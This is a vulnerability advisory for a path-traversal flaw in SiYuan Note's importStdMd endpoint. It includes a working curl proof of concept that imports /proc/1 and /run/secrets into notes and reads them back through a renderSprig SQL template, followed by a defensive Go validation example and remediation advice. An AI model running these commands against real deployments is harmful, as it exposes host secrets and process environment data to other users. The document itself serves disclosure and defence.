CVE-2026-32750
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Description
### Summary

`POST /api/import/importStdMd` passes the `localPath` parameter directly to `model.ImportFromLocalPath` with **zero path validation**. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.

### Details

**File:** `kernel/api/import.go` - function `importStdMd`

```go
// Excerpt: arg holds the decoded JSON request body; the surrounding
// handler code (request parsing, response writing) is elided.
func importStdMd(c *gin.Context) {
	notebook := arg["notebook"].(string)
	localPath := arg["localPath"].(string) // no validation whatsoever
	toPath := arg["toPath"].(string)
	err := model.ImportFromLocalPath(notebook, localPath, toPath)
	// ↑ calls filelock.Walk(localPath, ...) - reads entire directory tree
	// and writes every file's content into workspace SQLite as note blocks
}
```

**`model.ImportFromLocalPath`** (`kernel/model/import.go:784`):

```go
func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {
	// ...
	filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {
		// reads file content → converts to .sy note → stores in database
	})
}
```

Unlike `globalCopyFiles`, there is **no blocklist at all**. Any readable path is accepted. The imported content is **permanently stored** in the workspace SQLite database and survives restarts.

**Chained attack with Bug #1 (renderSprig):** Admin imports sensitive files → content stored in `blocks` table → non-admin user queries via `querySQL` through `renderSprig`.
### PoC

**Environment:**

```bash
docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
```

**Exploit:**

```bash
TOKEN="YOUR_ADMIN_TOKEN"

# Step 1: Create a notebook to import into
NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \
  -H "Authorization: Token $TOKEN" -H "Content-Type: application/json" \
  -d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])")

# Step 2: Import /proc/1/ - stores cmdline, environ, maps as notes
curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/proc/1\",\"toPath\":\"/\"}"

# Step 3: Import Docker secrets (if present)
curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/run/secrets\",\"toPath\":\"/\"}"

# Step 4: Any authenticated user (non-admin) queries the imported secrets
curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT content FROM blocks LIMIT 50\")}}{{$r.content}}\n---\n{{end}}"}'
```

### Impact

An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike `globalCopyFiles`, there is no blocklist - `/proc/`, `/etc/`, `/run/secrets/`, `/home/` are all accepted. **Data persists** in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the `renderSprig` SQL injection (separate advisory), a non-admin user can then read all imported secrets without any additional privileges.
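As an added, defender-side example (not SiYuan's code and not part of the advisory), the following Go function shows the validation `importStdMd` is missing: it canonicalises `localPath` and accepts it only when it resolves to a location under a configured import root and under no blocked prefix, in the spirit of the blocklist the advisory says `globalCopyFiles` has. The function names, the import-root parameter and the prefix list are assumptions.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Hypothetical blocklist in the spirit of the one the advisory says globalCopyFiles
// has; constructed for this example, not SiYuan's own list.
var blockedPrefixes = []string{"/proc", "/sys", "/dev", "/etc", "/run/secrets", "/root", "/home"}

// canonical makes p absolute and follows every symlink component; a path that
// does not exist or cannot be read is an error, not something to hand to a walk.
func canonical(p string) (string, error) {
	abs, err := filepath.Abs(p)
	if err != nil {
		return "", err
	}
	return filepath.EvalSymlinks(abs)
}

// isUnder matches on a separator boundary, so "/run/secretsX" is not under "/run/secrets".
func isUnder(path, dir string) bool {
	dir = filepath.Clean(dir)
	return path == dir || strings.HasPrefix(path, dir+string(filepath.Separator))
}

// resolveImportPath is the check importStdMd lacks: it returns the resolved localPath
// only if it lies under importRoot and under no blocked prefix. Both checks run on the
// canonical path, so "..", doubled separators and symlink indirection cannot bypass them.
func resolveImportPath(importRoot, localPath string) (string, error) {
	root, err := canonical(importRoot)
	if err != nil {
		return "", fmt.Errorf("resolve import root: %w", err)
	}
	resolved, err := canonical(localPath)
	if err != nil {
		return "", fmt.Errorf("resolve import path: %w", err)
	}
	for _, p := range blockedPrefixes {
		if isUnder(resolved, p) {
			return "", fmt.Errorf("import path %q is under blocked prefix %q", resolved, p)
		}
	}
	if !isUnder(resolved, root) {
		return "", fmt.Errorf("import path %q is outside import root %q", resolved, root)
	}
	return resolved, nil
}
```

Passing the returned path, rather than the raw parameter, to `model.ImportFromLocalPath` refuses `/proc/1` and `/run/secrets` from the PoC above, as well as a symlink planted inside the root that points at them.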
Analysis
SiYuan Note contains an unrestricted path traversal vulnerability in the POST /api/import/importStdMd endpoint that allows authenticated administrators to recursively import arbitrary files from the host filesystem into the workspace database without any validation or blocklisting. Affected versions of SiYuan (pkg:go/github.com_siyuan-note_siyuan) allow admin users to permanently store sensitive files such as /proc/, /etc/, /run/secrets/, and other system directories as searchable note content, making them accessible to other workspace users including those with limited privileges. …
Remediation
Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Review file handling controls.
External POC / Exploit Code
GHSA-rjhh-m223-9qqv